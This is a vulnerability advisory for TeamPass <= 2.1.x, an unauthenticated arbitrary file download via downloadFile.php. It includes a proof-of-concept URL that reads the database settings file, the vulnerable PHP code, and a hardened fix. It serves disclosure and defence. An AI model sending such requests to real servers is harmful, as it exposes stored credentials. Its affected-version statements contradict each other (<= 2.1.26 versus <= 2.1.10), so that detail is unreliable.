1. ADVISORY INFORMATION
========================================

Title: TeamPass Passwords Management System - Unauthenticated Arbitrary File Download
Application: TeamPass Passwords Management System
Class: Sensitive Information Disclosure
Remotely Exploitable: Yes
Versions Affected: TeamPass Passwords Management System <= 2.1.26
Bugs: Arbitrary File Download
Date Found: 21.03.2016
Reported: 09.05.2016
Date of Public Advisory: 13.05.2016
Author: Hasan Emre Ozer

2. CREDIT
========================================

This vulnerability was identified during a penetration test
by Hasan Emre Ozer & Halit Alptekin from PRODAFT / INVICTUS.

Thank you to Mehmet Ince for the support.

3. DESCRIPTION
========================================

We decided to publish the vulnerability after its fix in release 2.1.26.

4. VERSIONS AFFECTED
========================================

TeamPass Passwords Management System <= 2.1.10

5. TECHNICAL DETAILS & POC
========================================

The 'downloadFile.php' script in the 'sources' directory can be used to download any file, because both the directory and the file name it reads are taken from the request.

Proof of Concept (POC)

Example for downloading the database configuration:

http://teampass/sources/downloadFile.php?sub=includes&file=settings.php

Technical Details

<?php
......
// The download name is taken verbatim from the request.
header("Content-disposition: attachment; filename=".rawurldecode($_GET['name']));
header("Content-Type: application/octet-stream");
header("Pragma: public");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0, public");
header("Expires: 0");
// Vulnerable sink: 'sub' is concatenated into the path without an allowlist
// or canonicalisation, so the caller chooses the directory that is read;
// basename() only restricts the 'file' part.
readfile('../'.$_GET['sub'].'/'.basename($_GET['file']));
?>

The $_GET['sub'] and $_GET['file'] parameters reach the readfile() call without validation. basename() is applied only to 'file', so 'sub' still controls which directory is read, and in the PoC request it selects 'includes', where settings.php lives.

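As an added example (not TeamPass's own code), a hardened form of the readfile() call above: the directory comes from a fixed allowlist instead of the 'sub' parameter, the file name is reduced to its basename, and the canonical path is checked to still lie inside that directory before anything is read. The 'upload' directory name and the install-root location are assumptions.

```php
<?php
// Added example, not TeamPass code: a hardened replacement for the readfile()
// call in the advisory. 'upload' and the install-root location are assumptions.

// Directories that may legitimately serve downloads. 'includes' (where
// settings.php lives) is deliberately not listed.
const ALLOWED_SUBDIRS = ['upload'];

/**
 * Resolve a download request to an absolute path inside $root/$sub,
 * or return null when the request must be refused.
 */
function resolveDownloadPath(string $root, string $sub, string $file): ?string
{
    // 1. The directory must come from the allowlist, not from the URL.
    if (!in_array($sub, ALLOWED_SUBDIRS, true)) {
        return null;
    }
    // 2. Keep only the file name; '.' and '..' are not valid names.
    $file = basename($file);
    if ($file === '' || $file === '.' || $file === '..') {
        return null;
    }
    // 3. Canonicalise the directory first, so a missing directory can
    //    never make the file path resolve relative to somewhere else.
    $base = realpath($root . '/' . $sub);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . '/' . $file);
    // 4. realpath() follows symlinks, so check containment on the final
    //    path and require a regular file.
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

$root = dirname(__DIR__); // install directory, one level above 'sources'
$path = resolveDownloadPath($root, $_GET['sub'] ?? '', $_GET['file'] ?? '');
if ($path === null) {
    http_response_code(403);
    exit;
}
// Use the resolved name for the download header instead of echoing input.
$name = str_replace(['"', "\r", "\n"], '', basename($path));
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Type: application/octet-stream');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

With the PoC request above (sub=includes&file=settings.php) resolveDownloadPath() returns null, because 'includes' is not on the allowlist.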
6. SOLUTION
========================================

Update to the latest version, v2.1.26.

7. REFERENCES
========================================

http://teampass.net/2016-05-13-release-2.1.26